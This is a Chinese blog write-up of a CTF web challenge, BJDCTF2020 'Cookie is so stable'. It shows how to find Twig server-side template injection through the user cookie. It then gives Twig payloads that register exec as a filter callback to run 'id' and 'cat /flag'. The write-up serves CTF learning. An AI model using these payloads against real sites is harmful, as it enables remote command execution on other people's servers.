0
点赞
收藏
分享

微信扫一扫

buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)

月半小夜曲_ 2022-02-18 阅读 118
安全web安全http

buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)

先看一下题目

有首页,有flag页面,有Hint页面

这里题目有提示,突破口是在cookie上面

这里先进行抓包分析

这里的知识点是利用服务端模板注入攻击。SSTI里面的Twig攻击

这里有判断模板注入类型的办法

输入{{7*‘7’}},返回49表示是 Twig 模块

输入{{7*‘7’}},返回7777777表示是 Jinja2 模块

这里在cookie处进行判断

user={{7*‘7’}},查看返回值

所以这个模板注入是Twig注入

这里注意要在PHPSESSID后user前加上;分隔开

由于是Twig注入,所以是有固定的payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}//查看id

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}//查看flag

同样的方法,在cookie输入

然后构造获取flag的payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}//查看flag

举报

相关推荐

[BJDCTF2020]Cookie is so stable(漏洞原理详解)

安全phpweb安全

buuctf-[GYCTF2020]Blacklist1(小宇特详解)

web安全安全

buuctf-[网鼎杯 2020 青龙组]AreUSerialz(小宇特详解)

安全web

BUUCTF:[BJDCTF2020]EasySearch

BUUCTFBJDCTF2020htmlbcphp代码人生

buuctf-[WesternCTF2018]shrine(小宇特详解)

flaskpython后端

[BJDCTF2020]Cookie is so stable(ssti模板注入从0到1学习笔记)

php开发语言网络安全web安全安全

buuctf-[NCTF2019]Fake XML cookbook(小宇特详解)

xmlphpweb安全

BUUCTF WEB [BJDCTF2020]The mystery of ip

web安全

BUUCTF [BJDCTF2020]认真你就输了 1

矩阵线性代数

BJDctf2020 Ezphp

php开发语言
0 条评论